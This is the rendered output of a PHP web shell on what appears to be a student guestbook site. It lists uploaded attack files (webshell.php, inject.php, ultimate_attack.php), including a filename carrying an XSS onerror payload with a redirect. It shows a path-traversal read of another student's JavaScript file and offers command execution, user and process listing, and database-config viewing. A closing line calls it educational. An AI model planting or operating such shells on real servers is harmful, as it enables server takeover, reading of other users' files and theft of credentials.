🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../584311.klas4s23.mid-ica.nl/public_html/ergowijzer/javascript/sit-stand.js

class ImageData {
    constructor(image, position, text) {
        this.image = image;
        this.position = position;
        this.text = text;
    }
}

let images = [];
images.push(new ImageData('../assets/ssd/low.webp', { x: 0, y: 0 }, "The desk goes down to 70cm"));
images.push(new ImageData('../assets/ssd/high.webp', { x: 0, y: 2 }, "The desk goes up to 120cm"));
images.push(new ImageData('../assets/ssd/mid.webp', { x: 0, y: 1 }, "The desk can be stopped at any height"));


let minX = images[0].position.x;
let maxX = images[0].position.x;
let minY = images[0].position.y;
let maxY = images[0].position.y;
images.forEach(item => {
    const { x, y } = item.position;
    minX = Math.min(minX, x);
    maxX = Math.max(maxX, x);
    minY = Math.min(minY, y);
    maxY = Math.max(maxY, y);
});

let currentPosition = { x: 0, y: 0 };

function failed(side) {
    console.log("Failed to move " + side);
    let button = document.querySelector(".ssd .image ." + side);
    button.classList.add("failed");
    setTimeout(() => {
        button.classList.remove("failed");
    }, 100);
}

function up() {
    let start = currentPosition.y;
    if (currentPosition.y == maxY) {
        currentPosition.y = minY;
    } else {
        currentPosition.y = currentPosition.y + 1;
    }
    let end = currentPosition.y;
    if (start == end) {
        failed("up");
    }
    update();
}
function down() {
    let start = currentPosition.y;
    if (currentPosition.y == minY) {
        currentPosition.y = maxY;
    } else {
        currentPosition.y = currentPosition.y - 1;
    }
    let end = currentPosition.y;
    if (start == end) {
        failed("down");
    }
    update();
}
function left() {
    let start = currentPosition.x;
    if (currentPosition.x == minX) {
        currentPosition.x = maxX;
    } else {
        currentPosition.x = currentPosition.x - 1;
    }
    let end = currentPosition.x;
    if (start == end) {
        failed("left");
    }
    update();
}
function right() {
    let start = currentPosition.x;
    if (currentPosition.x == maxX) {
        currentPosition.x = minX;
    } else {
        currentPosition.x = currentPosition.x + 1;
    }
    let end = currentPosition.x;
    if (start == end) {
        failed("right");
    }
    update();
}
function getCurrentImage() {
    let currentImage = images.find(image => {
        return image.position.x === currentPosition.x && image.position.y === currentPosition.y;
    });
    return currentImage;
}

function update() {
    images.sort((a, b) => {
        // Compare x values first
        if (a.position.x !== b.position.x) {
            return a.position.x - b.position.x;
        }
        // If x values are equal, compare y values
        return a.position.y - b.position.y;
    });
    document.querySelector('.ssd .image-container img').src = getCurrentImage().image;
    document.querySelector(".ssd .image #subtext").innerHTML = getCurrentImage().text + " (" + Number(currentPosition.y + 1) + ")";
}
update();

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!